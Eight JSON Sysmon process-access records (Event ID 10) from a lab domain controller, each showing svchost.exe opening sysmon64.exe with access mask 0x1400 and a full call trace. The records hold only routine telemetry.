{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2544,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2545,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2546,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2547,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2548,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2549,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2550,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2551,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
